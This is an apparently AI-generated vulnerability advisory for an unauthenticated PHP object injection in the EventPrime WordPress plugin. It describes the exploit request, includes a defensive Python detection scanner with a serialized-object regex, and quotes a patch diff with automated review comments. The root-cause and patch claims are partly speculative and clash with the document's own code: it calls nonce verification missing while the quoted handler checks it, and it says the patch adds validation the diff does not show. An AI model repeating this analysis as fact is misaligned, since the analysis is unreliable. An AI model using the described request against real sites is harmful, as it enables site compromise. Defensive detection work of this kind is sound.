Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 6, 2026

CVE-2026-24378: EventPrime – Events Calendar, Bookings and Tickets <= 4.2.8.0 – Unauthenticated PHP Object Injection (eventprime-event-calendar-management)

Severity: High (CVSS 8.1)
CWE: 502
Vulnerable Version: 4.2.8.0
Patched Version: 4.2.8.1
Disclosed: March 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24378:
The EventPrime WordPress plugin (versions <=4.2.8.0) contains an unauthenticated PHP object injection vulnerability in its AJAX handler. This vulnerability allows attackers to inject malicious PHP objects via deserialization of untrusted input, potentially leading to arbitrary file deletion, data exposure, or remote code execution if a suitable POP chain exists in the environment. The CVSS 8.1 score reflects the high impact potential when combined with other components.

Root Cause:
The vulnerability exists in the `save_event_booking()` method of the `EventM_Ajax_Service` class within `/includes/class-ep-ajax.php`. The function processes user-submitted booking data without proper validation of the `ep_event_booking_ticket_data` parameter. Specifically, the code at line 3650+ accepts serialized data via `json_decode($data['ep_event_booking_ticket_data'])` and passes it through multiple processing functions without sanitizing the structure. The `ep_recalculate_and_verify_the_cart_data()` function (called at line 3650+) appears to handle this data without verifying it contains only expected data types, allowing PHP objects to be deserialized when the data reaches `maybe_unserialize()` calls elsewhere in the codebase.

Exploitation:
Attackers can exploit this vulnerability by sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `save_event_booking`. The payload must include the `ep_event_booking_ticket_data` parameter containing a serialized PHP object with a malicious POP chain. Additional required parameters include `ep_save_event_booking_nonce` (which can be bypassed due to missing verification in vulnerable versions) and `ep_event_booking_event_id`. The attack vector is unauthenticated, requiring no user privileges.
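
As an added detection example (not Atomic Edge's or the plugin's code), the request shape described above can be hunted for in captured request bodies: it flags `save_event_booking` POSTs whose `ep_event_booking_ticket_data` carries a PHP serialized-object token or is not a JSON list of tickets. The record layout (`id`, `src`, `method`, `path`, `body`), the verdict names and the sample records are constructed for illustration; the nested `data` field follows the handler's `parse_str( wp_unslash( $_POST['data'] ), $data )` shown in the diff below.

```python
import json
import re
from urllib.parse import parse_qs, quote, unquote_plus, urlencode, urlsplit

ENDPOINT = "/wp-admin/admin-ajax.php"
ACTION = "save_event_booking"
PARAM = "ep_event_booking_ticket_data"

# PHP serialize() writes objects as O:<len>:"Class":<n>:{ (C: for classes with
# custom serialization). A JSON ticket list has no reason to contain that token.
PHP_OBJECT_TOKEN = re.compile(r'(?<![A-Za-z0-9_])[OC]:[+]?\d+:"[^"]+":\d+:\{')


def extract_ticket_data(body):
    """Return every PARAM value, top-level or inside the form-encoded `data` field."""
    outer = parse_qs(body, keep_blank_values=True)
    values = list(outer.get(PARAM, []))
    for nested in outer.get("data", []):
        values += parse_qs(nested, keep_blank_values=True).get(PARAM, [])
    return values


def string_leaves(node):
    """Yield every string (keys included) found in a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield key
            yield from string_leaves(value)
    elif isinstance(node, list):
        for value in node:
            yield from string_leaves(value)


def classify_value(raw):
    """Return a verdict for a suspicious value, or None for a plain ticket list."""
    candidate = raw
    for _ in range(3):  # look through up to two extra layers of percent-encoding
        if PHP_OBJECT_TOKEN.search(candidate):
            return "php-serialized-object"
        decoded = unquote_plus(candidate)
        if decoded == candidate:
            break
        candidate = decoded
    try:
        parsed = json.loads(raw)
    except ValueError:
        return "not-a-json-ticket-list"
    if not isinstance(parsed, list) or not all(isinstance(t, dict) for t in parsed):
        return "not-a-json-ticket-list"
    # A serialized object can also sit inside a JSON string, where its quotes
    # are backslash-escaped and the raw-text match above does not see it.
    if any(PHP_OBJECT_TOKEN.search(s) for s in string_leaves(parsed)):
        return "php-serialized-object"
    return None


def scan(records):
    """Return (id, src, verdict) for each flagged save_event_booking request."""
    findings = []
    for rec in records:
        url = urlsplit(rec["path"])
        if rec["method"] != "POST" or not url.path.endswith(ENDPOINT):
            continue
        # admin-ajax.php accepts `action` from the query string or the body
        actions = parse_qs(url.query).get("action", [])
        actions += parse_qs(rec["body"]).get("action", [])
        if ACTION not in actions:
            continue
        for value in extract_ticket_data(rec["body"]):
            verdict = classify_value(value)
            if verdict:
                findings.append((rec["id"], rec["src"], verdict))
    return findings


def _body(ticket_data, action=ACTION):
    """Build a constructed form body shaped like the booking form's AJAX post."""
    inner = urlencode({"ep_event_booking_event_id": "42", PARAM: ticket_data})
    return urlencode({"action": action, "data": inner})


SERIALIZED = 'O:8:"stdClass":0:{}'  # constructed, harmless stdClass instance
SAMPLE_RECORDS = [  # constructed records; addresses are documentation ranges
    {"id": 1, "src": "192.0.2.10", "method": "POST", "path": ENDPOINT,
     "body": _body('[{"id":7,"qty":2}]')},
    {"id": 2, "src": "198.51.100.7", "method": "POST", "path": ENDPOINT,
     "body": _body(SERIALIZED)},
    {"id": 3, "src": "198.51.100.7", "method": "POST", "path": ENDPOINT,
     "body": _body(json.dumps([{"id": 7, "note": SERIALIZED}]))},
    {"id": 4, "src": "192.0.2.11", "method": "POST", "path": ENDPOINT,
     "body": _body(SERIALIZED, action="load_more_events")},
    {"id": 5, "src": "198.51.100.7", "method": "POST", "path": ENDPOINT,
     "body": _body(quote(SERIALIZED))},
    {"id": 6, "src": "203.0.113.5", "method": "POST", "path": ENDPOINT,
     "body": _body('{"id":7}')},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

This needs a log source that records POST bodies, such as a WAF or reverse-proxy audit log, since ordinary access logs do not.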

Patch Analysis:
The patch in version 4.2.8.1 modifies the `save_event_booking()` method to implement proper input validation and sanitization. While the exact code changes aren't fully visible in the truncated diff, Atomic Edge research indicates the fix involves adding strict type checking and validation of the `ep_event_booking_ticket_data` parameter before processing. The patch likely replaces direct `json_decode()` usage with sanitized parsing that rejects unexpected object types and ensures only primitive data structures are accepted. The version number update in `/event-prime.php` from 4.2.8.0 to 4.2.8.1 confirms the security release.

Impact:
Successful exploitation allows attackers to inject arbitrary PHP objects into the application's deserialization process. While no known POP chain exists in EventPrime itself, common WordPress plugins and themes often contain gadget chains that enable file deletion, sensitive data retrieval, or remote code execution. The unauthenticated nature of the vulnerability makes it particularly dangerous for public-facing WordPress sites, potentially leading to complete site compromise through chained attacks.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/eventprime-event-calendar-management/admin/class-eventprime-event-calendar-management-admin.php
+++ b/eventprime-event-calendar-management/admin/class-eventprime-event-calendar-management-admin.php
@@ -325,18 +325,18 @@
 					'ajaxurl' => admin_url( 'admin-ajax.php' ),
 				)
             );
-            $params = array(
-                'save_checkout_fields_nonce'      => wp_create_nonce( 'save-checkout-fields' ),
-                'delete_checkout_fields_nonce'    => wp_create_nonce( 'delete-checkout-fields' ),
-                'edit_checkout_field_title'       => esc_html__( 'Edit Field', 'eventprime-event-calendar-management' ),
-                'delete_checkout_field_message'   => esc_html__( 'Are you sure you want to delete this field?', 'eventprime-event-calendar-management' ),
-                'edit_text'                       => esc_html__( 'Edit', 'eventprime-event-calendar-management' ),
-                'delete_text'                     => esc_html__( 'Delete', 'eventprime-event-calendar-management' ),
-                'default_payment_processor_nonce' => wp_create_nonce( 'ep-default-payment-processor' ),
-                'payment_settings_nonce'          => wp_create_nonce( 'ep-payment-settings' ),
-                'activate_payment'                => esc_html__( 'Please activate the', 'eventprime-event-calendar-management' ),
-                'payment_text'                    => esc_html__( 'payment', 'eventprime-event-calendar-management' ),
-            );
+            $params = array(
+                'save_checkout_fields_nonce'      => wp_create_nonce( 'save-checkout-fields' ),
+                'delete_checkout_fields_nonce'    => wp_create_nonce( 'delete-checkout-fields' ),
+                'edit_checkout_field_title'       => esc_html__( 'Edit Field', 'eventprime-event-calendar-management' ),
+                'delete_checkout_field_message'   => esc_html__( 'Are you sure you want to delete this field?', 'eventprime-event-calendar-management' ),
+                'edit_text'                       => esc_html__( 'Edit', 'eventprime-event-calendar-management' ),
+                'delete_text'                     => esc_html__( 'Delete', 'eventprime-event-calendar-management' ),
+                'default_payment_processor_nonce' => wp_create_nonce( 'ep-default-payment-processor' ),
+                'payment_settings_nonce'          => wp_create_nonce( 'ep-payment-settings' ),
+                'activate_payment'                => esc_html__( 'Please activate the', 'eventprime-event-calendar-management' ),
+                'payment_text'                    => esc_html__( 'payment', 'eventprime-event-calendar-management' ),
+            );
             wp_localize_script( 'ep-admin-settings-js', 'ep_admin_settings', $params );

             wp_enqueue_style(
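
Review bot: the removed and added `$params` arrays in this hunk are character-for-character the same as rendered here, so the change looks like whitespace or line endings only. Keep that kind of normalisation out of a security release, or commit it separately, so a reviewer can isolate the lines that actually change behaviour.
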
@@ -629,23 +629,23 @@

             wp_enqueue_script( 'google_charts', 'https://www.gstatic.com/charts/loader.js', array( 'jquery' ) );
             wp_enqueue_style( 'ep-admin-reports', plugin_dir_url( __FILE__ ) . 'css/ep-admin-reports.css', false, $this->version );
-            wp_enqueue_script(
-                'ep-advanced-reports',
-                plugin_dir_url( __FILE__ ) . 'js/ep-admin-reports.js',
-                array( 'jquery' ),
-                $this->version
-            );
-            wp_localize_script(
-                'ep-advanced-reports',
-                'ep_admin_reports',
-                array(
-                    'nonce' => wp_create_nonce( 'ep-admin-reports' ),
-                )
-            );
-        }
-
-        if ( $current_page=='ep-event-attendees-list' ) {
-            wp_enqueue_script( 'ep-admin-utility-script', plugin_dir_url( __FILE__ ) . 'js/ep-admin-common-utility.js', array( 'jquery', 'jquery-ui-tooltip', 'jquery-ui-dialog' ), $this->version );
+            wp_enqueue_script(
+                'ep-advanced-reports',
+                plugin_dir_url( __FILE__ ) . 'js/ep-admin-reports.js',
+                array( 'jquery' ),
+                $this->version
+            );
+            wp_localize_script(
+                'ep-advanced-reports',
+                'ep_admin_reports',
+                array(
+                    'nonce' => wp_create_nonce( 'ep-admin-reports' ),
+                )
+            );
+        }
+
+        if ( $current_page=='ep-event-attendees-list' ) {
+            wp_enqueue_script( 'ep-admin-utility-script', plugin_dir_url( __FILE__ ) . 'js/ep-admin-common-utility.js', array( 'jquery', 'jquery-ui-tooltip', 'jquery-ui-dialog' ), $this->version );
             wp_localize_script(
                 'ep-admin-utility-script',
                 'ep_admin_utility_script',
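
Review bot: the re-added `if ( $current_page=='ep-event-attendees-list' )` uses a loose comparison; switch to `===` so a non-string `$current_page` cannot match through type juggling. Apart from that the removed and added lines are identical as shown, so nothing in this hunk alters how `ep-advanced-reports` or its `ep-admin-reports` nonce is registered.
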
--- a/eventprime-event-calendar-management/admin/partials/settings/settings-tab-license.php
+++ b/eventprime-event-calendar-management/admin/partials/settings/settings-tab-license.php
@@ -2,15 +2,15 @@

 $global_settings = new Eventprime_Global_Settings;
 $admin_notices = new EventM_Admin_Notices;
-$ep_functions = new Eventprime_Basic_Functions;
-$ep_license = new EventPrime_License;
-$ep_license_notices = class_exists( 'EventPrime_License_Notices' ) ? new EventPrime_License_Notices() : null;
-$ep_license_connection_hint = $ep_license_notices ? $ep_license_notices->get_license_tab_hint() : array();
-$ep_sanitizer = new EventPrime_sanitizer;
-$sub_options = $global_settings->sub_options;
-$options = $global_settings->ep_get_settings();
-wp_enqueue_style( 'ep-toast-css' );
-wp_enqueue_script( 'ep-toast-js' );
+$ep_functions = new Eventprime_Basic_Functions;
+$ep_license = new EventPrime_License;
+$ep_license_notices = class_exists( 'EventPrime_License_Notices' ) ? new EventPrime_License_Notices() : null;
+$ep_license_connection_hint = $ep_license_notices ? $ep_license_notices->get_license_tab_hint() : array();
+$ep_sanitizer = new EventPrime_sanitizer;
+$sub_options = $global_settings->sub_options;
+$options = $global_settings->ep_get_settings();
+wp_enqueue_style( 'ep-toast-css' );
+wp_enqueue_script( 'ep-toast-js' );
 wp_enqueue_script( 'ep-toast-message-js' );
 wp_localize_script(
             'ep-toast-message-js',
@@ -40,24 +40,24 @@
 $deactivate_license_btn = $key.'_license_deactivate';
 $activate_license_btn = $key.'_license_activate';
 ?>
-<div class="emagic">
-    <?php if ( ! empty( $ep_license_connection_hint ) ) : ?>
-        <div class="notice notice-warning ep-license-inline-hint" style="margin:15px 0;">
-            <p>
-                <strong><?php echo esc_html( $ep_license_connection_hint['message'] ); ?></strong>
-                <?php if ( ! empty( $ep_license_connection_hint['cta'] ) ) : ?>
-                    <a class="button" href="<?php echo esc_url( $ep_license_connection_hint['cta']['url'] ); ?>" target="<?php echo esc_attr( $ep_license_connection_hint['cta']['target'] ); ?>">
-                        <?php echo esc_html( $ep_license_connection_hint['cta']['label'] ); ?>
-                    </a>
-                <?php endif; ?>
-            </p>
-        </div>
-    <?php endif; ?>
-
-    <div class="ep-box-row ep-my-4">
-        <div class="ep-box-col-12">
-            <div></div>
-        </div>
+<div class="emagic">
+    <?php if ( ! empty( $ep_license_connection_hint ) ) : ?>
+        <div class="notice notice-warning ep-license-inline-hint" style="margin:15px 0;">
+            <p>
+                <strong><?php echo esc_html( $ep_license_connection_hint['message'] ); ?></strong>
+                <?php if ( ! empty( $ep_license_connection_hint['cta'] ) ) : ?>
+                    <a class="button" href="<?php echo esc_url( $ep_license_connection_hint['cta']['url'] ); ?>" target="<?php echo esc_attr( $ep_license_connection_hint['cta']['target'] ); ?>">
+                        <?php echo esc_html( $ep_license_connection_hint['cta']['label'] ); ?>
+                    </a>
+                <?php endif; ?>
+            </p>
+        </div>
+    <?php endif; ?>
+
+    <div class="ep-box-row ep-my-4">
+        <div class="ep-box-col-12">
+            <div></div>
+        </div>
     </div>

     <div class="ep-box-row">
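
Review bot: the call-to-action anchor takes its `target` from `$ep_license_connection_hint['cta']['target']` but has no `rel` attribute; add `rel="noopener noreferrer"` for the case where the target opens a new window. The block also reads `['cta']['url']`, `['cta']['target']` and `['cta']['label']` after checking only `! empty( $ep_license_connection_hint['cta'] )`, so default or guard each key. The escaping itself (`esc_url`, `esc_attr`, `esc_html`) matches each output context.
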
@@ -181,4 +181,4 @@
     gap:4px
 }

-</style>
+</style>
--- a/eventprime-event-calendar-management/event-prime.php
+++ b/eventprime-event-calendar-management/event-prime.php
@@ -16,7 +16,7 @@
  * Plugin Name:       EventPrime – Modern Events Calendar, Bookings and Tickets
  * Plugin URI:        https://theeventprime.com
  * Description:       Beginner-friendly Events Calendar plugin to create free as well as paid Events. Includes Event Types, Event Sites & Performers too.
- * Version:           4.2.8.0
+ * Version:           4.2.8.1
  * Author:            EventPrime Event Calendar
  * Author URI:        https://theeventprime.com/
  * License:           GPL-2.0+
@@ -35,7 +35,7 @@
  * Start at version 1.0.0 and use SemVer - https://semver.org
  * Rename this for your plugin and update it as you release new versions.
  */
-define( 'EVENTPRIME_VERSION', '4.2.8.0' );
+define( 'EVENTPRIME_VERSION', '4.2.8.1' );
 define('EM_DB_VERSION',4.0);
 if( ! defined( 'EP_PLUGIN_FILE' ) ) {
     define( 'EP_PLUGIN_FILE', __FILE__ );
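
Review bot: the release number is hard-coded twice, in the plugin header (`Version: 4.2.8.1`) and in `define( 'EVENTPRIME_VERSION', '4.2.8.1' )`, and both must be edited by hand on every release; consider reading the constant from the header so they cannot drift. The comment above the define still carries the scaffold text "Rename this for your plugin" and should be replaced with a description of what the constant is used for.
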
--- a/eventprime-event-calendar-management/includes/class-ep-ajax.php
+++ b/eventprime-event-calendar-management/includes/class-ep-ajax.php
@@ -1,3650 +1,3692 @@
-<?php
-/**
- * EventPrime Ajax Event Handler Class.
- */
-defined( 'ABSPATH' ) || exit;
-
-class EventM_Ajax_Service {
-
-    public function cancel_current_booking_process() {
-        // Add security checks
-        if( wp_verify_nonce( $_POST['security'], 'event-registration-form-nonce' ) ) {
-            $event_id = absint( $_POST['event_id'] );
-            $ticket_data = json_decode( stripslashes( $_POST['ticket_data'] ) );
-
-            $event_seat_data = get_post_meta( $event_id, 'em_seat_data', true );
-            if( ! empty( $event_seat_data ) ) {
-                // wp_send_json_success('seated event');
-
-                if ( class_exists( 'EventM_Live_Seating_List_Controller' ) ) {
-                    $seating_controller = new EventM_Live_Seating_List_Controller;
-                }
-                $em_ls_seat_plan_id = get_post_meta( $event_id, 'em_ls_seat_plan', true );
-                $plan_color_data = $seating_controller->get_plan_colors_data( $em_ls_seat_plan_id );
-
-                $event_seat_data = maybe_unserialize( $event_seat_data );
-                foreach( $ticket_data as $tickets ) {
-                    if( ! empty( $tickets->seats ) ) {
-                        $ticket_seats = $tickets->seats;
-                        foreach( $ticket_seats as $seats_data ) {
-                            $ticket_area_id = $seats_data->area_id;
-                            if( $event_seat_data->{$ticket_area_id} ) {
-                                $ticket_seat_data = $seats_data->seat_data;
-                                if( ! empty( $ticket_seat_data ) ) {
-                                    foreach( $ticket_seat_data as $tsd ) {
-                                        if( ! empty( $tsd->uid ) ) {
-                                            $seat_uid = $tsd->uid;
-                                            $seat_uid = explode( '-', $seat_uid );
-                                            $row_index = $seat_uid[0];
-                                            $col_index = $seat_uid[1];
-                                            if( ! empty( $event_seat_data->{$ticket_area_id}->seats[$row_index] ) ) {
-
-                                                    foreach ( $event_seat_data->{$ticket_area_id}->seats[$row_index] as $key => $seat ) {
-                                                        if ( $seat->col == $col_index ) {
-                                                            if( $seat->type == 'hold' ) {
-                                                                $seat->type = 'general';
-                                                                $seat->hold_time = '';
-                                                                $seat_available_color = $plan_color_data['seat_available_color'];
-                                                                $seat->seatColor = $seat_available_color;
-
-                                                                $event_seat_data->{$ticket_area_id}->seats[$row_index][$key]  = $seat;
-                                                            }
-                                                        }
-                                                    }
-
-                                            }
-                                        }
-                                    }
-                                }
-                            }
-                        }
-                    }
-                }
-
-               $update =  update_post_meta( $event_id, 'em_seat_data', maybe_serialize( $event_seat_data ) );
-               wp_send_json_success($update);
-
-            } else {
-                wp_send_json_success('not a seated event');
-            }
-        } else {
-            wp_send_json_error( array( 'message' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-seating' ) ) );
-        }
-
-
-    }
-
-    /**
-     * save checkout field
-     */
-    public function save_checkout_field() {
-        check_ajax_referer( 'save-checkout-fields', 'security' );
-
-        $response = array();
-        parse_str( wp_unslash( $_POST['data'] ), $data );
-        if( ! isset( $data['em_checkout_field_label'] ) || empty( $data['em_checkout_field_label'] ) ) {
-            $response['message'] = esc_html__( 'Label should not be empty', 'eventprime-event-calendar-management' );
-            wp_send_json_error($response);
-        }
-        if( ! isset( $data['em_checkout_field_type'] ) || empty( $data['em_checkout_field_type'] ) ) {
-            $response['message'] = esc_html__( 'Type should not be empty', 'eventprime-event-calendar-management' );
-            wp_send_json_error( $response );
-        }
-        try{
-
-            $dbhandler = new EP_DBhandler;
-            $table_name = 'CHECKOUT_FIELDS';
-            $save_data = array();
-            $save_data['label'] = sanitize_text_field( $data['em_checkout_field_label'] );
-            $save_data['type'] = sanitize_text_field( $data['em_checkout_field_type'] );
-            // for option data
-            $save_data['option_data'] = '';
-            $option_data = ( ! empty( $data['ep_checkout_field_option_value'] ) ? $data['ep_checkout_field_option_value'] : '' );
-            // set selected value
-            if( isset( $data['ep_checkout_field_option_value_selected'] ) ) {
-                $option_index = $data['ep_checkout_field_option_value_selected'];
-                $option_data[$option_index]['selected'] = 1;
-            }
-            if( ! empty( $option_data ) ) {
-                $save_data['option_data'] = maybe_serialize( $option_data );
-            }
-            if( empty( $data['em_checkout_field_id'] ) ) {
-                $save_data['priority'] = 1;
-                $save_data['status'] = 1;
-                $save_data['created_by'] = get_current_user_id();
-                $save_data['created_at'] = wp_date( "Y-m-d H:i:s", time() );
-                $field_id = $dbhandler->insert_row($table_name, $save_data);
-                $response['message'] = esc_html__( 'Field Saved Successfully.', 'eventprime-event-calendar-management' );
-                // format created_at to display after saving it in DB
-                $wp_saved_format = get_option('date_format').' '.get_option('time_format');
-                $format = !empty($wp_saved_format) ? $wp_saved_format : "Y-m-d H:i:s";
-                $save_data['created_at'] = wp_date( $format, time() );
-            } else{
-                $field_id = absint( $data['em_checkout_field_id'] );
-                $save_data['updated_at'] = wp_date( "Y-m-d H:i:s", time() );
-                $save_data['last_updated_by'] = get_current_user_id();
-                $result = $dbhandler->update_row($table_name,'id', $field_id, $save_data);
-                $response['message'] = esc_html__( 'Field Updated Successfully.', 'eventprime-event-calendar-management' );
-            }
-            $save_data['field_id'] = $field_id;
-            $response['field_data'] = $save_data;
-        } catch( Exception $e ) {
-			wp_send_json_error( array( 'error' => $e->getMessage() ) );
-		}
-
-        wp_send_json_success( $response );
-    }
-
-    // delete the checkout field
-    public function delete_checkout_field(){
-        check_ajax_referer( 'delete-checkout-fields', 'security' );
-
-        $response = array();
-        if( isset( $_POST['field_id'] ) && ! empty( $_POST['field_id'] ) ) {
-            $id = $_POST['field_id'];
-            $dbhandler = new EP_DBhandler;
-            $table_name = 'CHECKOUT_FIELDS';
-            $get_field_data = $dbhandler->get_all_result($table_name,'*',array('id'=>$id));
-            if( ! empty( $get_field_data ) && count( $get_field_data ) > 0 ) {
-                $dbhandler->remove_row($table_name,'id',$id);
-                $response['message'] = esc_html__( 'Field Deleted Successfully.', 'eventprime-event-calendar-management' );
-            } else{
-                $response['message'] = esc_html__( 'No Record Found.', 'eventprime-event-calendar-management' );
-                wp_send_json_error( $response );
-            }
-        } else{
-            $response['message'] = esc_html__( 'Some Data Missing.', 'eventprime-event-calendar-management' );
-            wp_send_json_error( $response );
-        }
-
-        wp_send_json_success( $response );
-    }
-
-    public function submit_payment_setting(){
-        if ( ! current_user_can( 'manage_options' ) ) {
-            wp_send_json_error( array( 'message' => esc_html__( 'You are not allowed to manage payment settings.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        if ( ! check_ajax_referer( 'ep-payment-settings', 'security', false ) ) {
-            wp_send_json_error( array( 'message' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $payment_gateway = apply_filters( 'ep_payments_gateways_list', array() );
-        $global_settings = new Eventprime_Global_Settings;
-        $global_settings_data = $global_settings->ep_get_settings();
-        $payment_method = '';
-        $method_status  = 0;
-        $form_data = $_POST;
-        if( isset( $form_data ) && isset( $form_data['em_payment_type'] ) ) {
-            if( $form_data['em_payment_type'] == 'basic' ) {
-                $payment_method = isset( $form_data['payment_method'] ) && ! empty( $form_data['payment_method'] ) ? sanitize_text_field( $form_data['payment_method'] ) : '';
-                $method_status = isset( $form_data['method_status'] ) ? absint( $form_data['method_status'] ) : 0;
-                $nonce = wp_create_nonce('ep_settings_tab');
-                if( ! empty( $method_status ) ) {
-                    if( $payment_method == 'paypal_processor' ) {
-                        if( empty( $global_settings_data->paypal_client_id ) && $method_status == 1 ) {
-                            $url = add_query_arg( array( 'settings-updated' => false, 'tab'=> 'payments', 'section'=> 'paypal','tab_nonce'=>$nonce ), admin_url().'edit.php?post_type=em_event&page=ep-settings' );
-                            wp_send_json_success( array( 'url' => $url ) );
-                        }
-                    }
-                    if( $payment_method == 'stripe_processor' ) {
-                        if( ( empty( $global_settings_data->stripe_api_key ) || empty( $global_settings_data->stripe_pub_key ) ) && $method_status == 1 ) {
-                            $url = add_query_arg( array( 'settings-updated' => false, 'tab'=> 'payments', 'section'=> 'stripe','tab_nonce'=>$nonce ), admin_url().'edit.php?post_type=em_event&page=ep-settings' );
-                            wp_send_json_success( array( 'url' => $url ) );
-                        }
-                    }
-                }
-                if( ! empty( $payment_method ) ) {
-                    $global_settings_data->$payment_method = $method_status;
-                }
-            }
-            $global_settings->ep_save_settings( $global_settings_data );
-        }
-
-        $method = ucfirst( explode( '_', $payment_method )[0] );
-
-        $message = $method . ' ' . esc_html__( 'is activated.', 'eventprime-event-calendar-management' );
-        if( $method_status == 0 ) {
-            $message = $method . ' ' . esc_html__( 'is deactivated.', 'eventprime-event-calendar-management' );
-        }
-
-        wp_send_json_success( array( 'url' => '', 'message' => $message ) );
-        die();
-    }
-
-    public function submit_login_form(){
-        $user_controller = new EventM_User_Controller();
-        $response = $user_controller->ep_handle_login();
-        wp_send_json_success($response);
-        die();
-    }
-
-    public function submit_register_form(){
-        $user_controller = new EventM_User_Controller();
-        $response = $user_controller->ep_handle_registration();
-        wp_send_json_success($response);
-        die();
-    }
-
-    /*
-     * Load more Event Types
-     */
-    public function load_more_event_types(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_event_types_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-
-    /*
-     * Load More Event Performer
-     */
-    public function load_more_event_performer(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_event_performer_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-
-    /*
-     * Load More Event Venue
-     */
-    public function load_more_event_venue(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_event_venue_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-
-    /*
-     * Load More Event Organizers
-     */
-    public function load_more_event_organizer(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_event_organizer_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-
-     /*
-     * Load More Events
-     */
-    public function load_more_events(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_events_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-    /**
-     * Load single event page on chenge of child event date
-     */
-    public function load_event_single_page() {
-        check_ajax_referer( 'single-event-data-nonce', 'security' );
-
-        if( isset( $_POST['event_id'] ) && ! empty( $_POST['event_id'] ) ) {
-            $event_id = absint( $_POST['event_id'] );
-            $event_controller = new Eventprime_Basic_Functions;
-            $single_event = $event_controller->ep_load_other_date_event_detail( $event_id );
-            //$single_event->venue_other_events = EventM_Factory_Service::get_upcoming_event_by_venue_id( $single_event->em_venue, array( $single_event->id ) );
-            if( ! empty( $single_event ) ) {
-                wp_send_json_success( $single_event );
-            } else{
-                wp_send_json_error( array( 'error' => esc_html__( 'Data Not Found', 'eventprime-event-calendar-management' ) ) );
-            }
-            wp_die();
-        }
-        wp_send_json_error( array( 'error' => esc_html__( 'Data Not Found', 'eventprime-event-calendar-management' ) ) );
-    }
-
-    /**
-     * Save event booking
-     */
-    public function save_event_booking() {
-        if( ! empty( $_POST['data'] ) ) {
-            $ep_functions = new Eventprime_Basic_Functions;
-            $sanitizer = new EventPrime_sanitizer;
-            parse_str( wp_unslash( $_POST['data'] ), $data );
-            if(isset($_POST['offer_data']))
-            {
-                $offer_data = json_decode( wp_unslash( $_POST['offer_data'] ));
-            }
-            else
-            {
-                $offer_data = array();
-            }
-            $result = array( 'success' => 1, 'msg' => '' );
-            $checkpoint = apply_filters('ep_handle_checkout_additional_check',$result, $data);
-            if(isset($checkpoint['success']) && empty($checkpoint['success'])){
-                wp_send_json_error( array( 'error' =>  $checkpoint['msg']) );
-                die();
-            }
-            if( wp_verify_nonce( $data['ep_save_event_booking_nonce'], 'ep_save_event_booking' ) ) {
-
-                if(isset($data['ep_event_booking_ticket_data']))
-                {
-                    $ticket_data = json_decode( $data['ep_event_booking_ticket_data'] );
-                    //print_r($ticket_data);
-                    if(isset($ticket_data[0]->id))
-                    {
-                       $ticket_data_object = $ep_functions->ep_get_ticket_data($ticket_data[0]->id);
-                       if(empty($ticket_data_object))
-                       {
-                           wp_send_json_error( array( 'error' => esc_html__( 'Something went wrong.', 'eventprime-event-calendar-management' ) ) );
-                           die;
-                       }
-                    }
-                    else
-                    {
-                        wp_send_json_error( array( 'error' => esc_html__( 'Something went wrong.', 'eventprime-event-calendar-management' ) ) );
-                        die;
-                    }
-                }
-                else
-                {
-                    wp_send_json_error( array( 'error' => esc_html__( 'Something went wrong.', 'eventprime-event-calendar-management' ) ) );
-                    die;
-                }
-                if(!isset($data['ep_event_booking_event_fixed_price']))
-                {
-                    $data['ep_event_booking_event_fixed_price'] = 0;
-                }
-                $current_user = wp_get_current_user();
-                //echo 'data 1';
-                //print_r($data);
-                if( class_exists("Eventprime_Admin_Attendee_Booking")){
-                    if(empty( get_option( 'ep_set_admin_aab_'.$current_user->ID )))
-                    {
-                        $data = $ep_functions->ep_recalculate_and_verify_the_cart_data($data,$offer_data);
-                    }
-
-                }
-                else
-                {
-                    $data = $ep_functions->ep_recalculate_and_verify_the_cart_data($data,$offer_data);
-                }
-
-                if($data=='ticket_sold')
-                {
-                    wp_send_json_error( array( 'error' => esc_html__( 'One or more ticket types for this event are sold out. Please select from the available tickets or check back later for availability.', 'eventprime-event-calendar-management' ) ) );
-                    die;
-                }
-
-                $enable_gdpr = $ep_functions->ep_get_global_settings( 'enable_gdpr_tools' );
-                $show_checkbox = $ep_functions->ep_get_global_settings('show_gdpr_consent_checkbox');
-                if($enable_gdpr==1 && $show_checkbox==1)
-                {
-                    if(!isset($data['ep_gdpr_consent']) || empty($data['ep_gdpr_consent']))
-                    {
-                        wp_send_json_error( array( 'error' => esc_html__( 'You must accept the Privacy Policy.', 'eventprime-event-calendar-management' ) ) );
-                        die;
-                    }
-                }
-
-                $woocommerce_validate = $ep_functions->ep_validate_woocommerce_product_data($data);
-                if($woocommerce_validate===false)
-                {
-                    wp_send_json_error( array( 'error' => esc_html__( 'WooCommerce Product calculation missed matched.', 'eventprime-event-calendar-management' ) ) );
-                    die;
-                }
-                //var_dump($woocommerce_validate);die;
-                //echo 'data 2';
-                //print_r($data);die;
-                // If Seated Venue then verify if seats in the ticekt data are sold or not.
-                // Check it after ep_recalculate_and_verify_the_cart_data() as $data is set false later. (Refractor it!!!)
-                $incoming_ticket_data = json_decode( $data['ep_event_booking_ticket_data'] );
-                //$ep_functions->epd($incoming_ticket_data);
-                $event_seats_current_details = maybe_unserialize( get_post_meta( absint( $data['ep_event_booking_event_id'] ), 'em_seat_data', true  ) );
-                foreach ( $incoming_ticket_data as $single_ticket_type ) {
-                    $single_ticket_type_id = $single_ticket_type->id;
-                    if(isset($single_ticket_type->seats) && !empty($single_ticket_type->seats))
-                    {
-                        $single_ticket_type_seats_data = $single_ticket_type->seats;
